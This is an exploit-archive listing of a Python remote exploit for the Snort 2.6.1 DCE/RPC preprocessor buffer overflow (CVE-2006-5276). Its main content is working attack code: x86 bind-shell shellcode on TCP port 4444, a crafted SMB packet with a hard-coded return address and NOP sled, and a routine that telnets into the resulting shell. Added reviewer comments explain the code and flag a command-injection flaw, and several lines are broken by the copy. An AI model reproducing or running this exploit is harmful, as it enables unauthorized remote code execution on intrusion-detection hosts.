




2007-03-30 Snort 2.6.1 DCE/RPC Preprocessor Remote Buffer Overflow Exploit (linux)
Rated as : High Risk

#!/usr/bin/python
#
# Remote exploit for Snort DCE/RPC preprocessor vulnerability as described in
# CVE-2006-5276. The exploit binds a shell to TCP port 4444 and connects to it.
# This code was tested against snort-2.6.1 running on Red Hat Linux 8
#
# Author shall bear no responsibility for any screw ups caused by using this code
# Winny Thomas :-)

import os
import sys
import time
from scapy import *

# Linux portbind shellcode; Binds shell on TCP port 4444
# Opaque x86 machine code that ExploitSnort appends verbatim to its payload.
# Nothing in it is configurable at run time: the listen port is baked into
# the bytes (presumably the "\x11\x5c" pair, 0x115c == 4444, the same port
# ConnectRemoteShell dials), which makes that port a stable indicator.
# NOTE(review): as reproduced on this page several assignments are split
# across a line break ("shellcode =" / string literal on the next line);
# that is a copy artifact of the listing and is left as-is here.
shellcode  =
"\x31\xdb\x53\x43\x53\x6a\x02\x6a\x66\x58\x99\x89\xe1\xcd\x80\x96"
shellcode +=
"\x43\x52\x66\x68\x11\x5c\x66\x53\x89\xe1\x6a\x66\x58\x50\x51\x56"
shellcode +=
"\x89\xe1\xcd\x80\xb0\x66\xd1\xe3\xcd\x80\x52\x52\x56\x43\x89\xe1"
shellcode +=
"\xb0\x66\xcd\x80\x93\x6a\x02\x59\xb0\x3f\xcd\x80\x49\x79\xf9\xb0"
shellcode +=
"\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53"
shellcode += "\x89\xe1\xcd\x80"

def ExploitSnort(target):
       """Emit one crafted SMB segment towards ``target`` on tcp/139.

       Per the file header the consumer is the Snort DCE/RPC preprocessor
       inspecting traffic on the path, not an SMB service on ``target``:
       this function builds a single PSH/ACK segment with scapy and calls
       ``send`` once -- no TCP handshake is performed and no reply is read.
       The payload is assembled in the order the comments below label it:
       NetBIOS session header, SMB header, Tree Connect AndX, NT Create
       AndX, then two Write AndX requests, the second of which ends with a
       hard-coded return address, ``\\x90`` (x86 nop) padding, the module
       level ``shellcode`` and more padding.

       The ``struct.pack`` line writes a fixed stack address, so the
       payload only fits the one build/environment the header names
       (snort-2.6.1 on Red Hat 8).  ``struct`` is never imported by name in
       this file; it is only in scope via ``from scapy import *``.
       From the wire side the segment is unsolicited (no prior SYN from
       this code) and always uses source port 1025.
       """
       # SMB packet borrowed from http://www.milw0rm.com/exploits/3391
       # NetBIOS Session Service
       smbreq = "\x00\x00\x02\xab"

       # SMB Header
       smbreq +=
"\xff\x53\x4d\x42\x75\x00\x00\x00\x00\x18\x07\xc8\x00\x00"
       smbreq +=
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xfe"
       smbreq += "\x00\x08\x30\x00"

       # Tree Connect AndX Request
       smbreq +=
"\x04\xa2\x00\x52\x00\x08\x00\x01\x00\x27\x00\x00"
       smbreq +=
"\x5c\x00\x5c\x00\x49\x00\x4e\x00\x53\x00\x2d\x00\x4b\x00\x49\x00"
       smbreq +=
"\x52\x00\x41\x00\x5c\x00\x49\x00\x50\x00\x43\x00\x24\x00\x00\x00"
       smbreq += "\x3f\x3f\x3f\x3f\x3f\x00"

       # NT Create AndX Request
       smbreq +=
"\x18\x2f\x00\x96\x00\x00\x0e\x00\x16\x00\x00\x00\x00\x00\x00\x00"
       smbreq +=
"\x9f\x01\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
       smbreq +=
"\x03\x00\x00\x00\x01\x00\x00\x00\x40\x00\x40\x00\x02\x00\x00\x00"
       smbreq +=
"\x01\x11\x00\x00\x5c\x00\x73\x00\x72\x00\x76\x00\x73\x00\x76\x00"
       smbreq += "\x63\x00\x00\x00"

       # Write AndX Request #1
       smbreq +=
"\x0e\x2f\x00\xfe\x00\x00\x40\x00\x00\x00\x00\xff\xff\xff\xff\x80"
       smbreq +=
"\x00\x48\x00\x00\x00\x48\x00\xb6\x00\x00\x00\x00\x00\x49\x00\xee"
       smbreq +=
"\x05\x00\x0b\x03\x10\x00\x00\x00\x10\x02\x00\x00\x01\x00\x00\x00"
       smbreq +=
"\xb8\x10\xb8\x10\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x01\x00"
       smbreq +=
"\xc8\x4f\x32\x4b\x70\x16\xd3\x01\x12\x78\x5a\x47\xbf\x6e\xe1\x88"
       smbreq +=
"\x03\x00\x00\x00\x04\x5d\x88\x8a\xeb\x1c\xc9\x11\x9f\xe8\x08\x00"
       smbreq += "\x2b\x10\x48\x60\x02\x00\x00\x00"

       # Write AndX Request #2
       smbreq +=
"\x0e\xff\x00\xde\xde\x00\x40\x00\x00\x00\x00\xff\xff\xff\xff\x80"
       smbreq +=
"\x00\x48\x00\x00\x00\xff\x01\xce\x01\x00\x00\x00\x00\x49\x00\xee"
       smbreq +=
"\xed\x1e\x94\x7c\x90\x81\xc4\xff\xef\xff\xff\x44"
       smbreq +=
"\x31\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xa9"
       # The following address overwrites RET and points into our shellcode.
       # It is a fixed stack address for the one tested build; nothing here
       # derives or verifies it.
       smbreq += struct.pack('<L', 0xbfffeff0)
       smbreq += '\x90' * 50
       smbreq += shellcode
       smbreq += '\x90' * 130

       # One raw segment, no handshake: scapy send() writes it and returns.
       packet = IP(dst=target) / TCP(sport=1025, dport=139,
flags="PA") / smbreq
       send(packet)

def ConnectRemoteShell(target):
       """Run the system telnet client against ``target`` port 4444.

       The command line is built by string concatenation and handed to
       ``os.system``, so ``target`` reaches the shell unquoted: any shell
       metacharacters in argv[1] are interpreted on the machine running
       this script (flagged, not changed here).  The port is the fixed one
       the shellcode comment names.  Blocks until telnet exits.
       """
       connect = '/usr/bin/telnet ' + target + ' 4444'
       os.system(connect)

if __name__ == '__main__':
       # Entry point.  Python 2 source (print statements); it will not
       # parse on Python 3.  Exactly one positional argument is consumed,
       # the address the crafted segment is sent to; it is not validated
       # before being passed to ExploitSnort and, via the shell, to telnet.
       try:
               target = sys.argv[1]
       except IndexError:
               print 'Usage: %s <ip of a host on snort network>' %
sys.argv[0]
               sys.exit(-1)

       print '[+] Sending malformed SMB packet'
       ExploitSnort(target)
       # Fixed delay before dialling the bind port; nothing checks whether
       # the send above had any effect.
       print '[+] Connecting to remote shell in 3 seconds...'
       time.sleep(3)
       ConnectRemoteShell(target)